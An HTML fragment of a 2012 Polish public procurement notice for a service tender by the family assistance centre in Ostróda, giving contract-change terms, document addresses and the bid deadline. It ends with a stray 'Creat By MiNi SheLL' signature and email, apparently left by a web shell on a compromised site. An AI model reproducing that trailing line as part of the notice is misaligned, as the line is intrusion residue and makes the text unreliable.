<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza dokonywanie zmian umowy w zakresie terminu realizacji usługi, w przypadku problemów wynikających z procesu rekrutacji leżących po stronie Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/powiat_ostrodzki/ oraz www. pcpr.ostroda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Ostródzie
14-100 Ostróda ul. Jana III Sobieskiego 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.09.2012 godzina 09:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Ostródzie
14-100 Ostróda ul. Jana III Sobieskiego 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com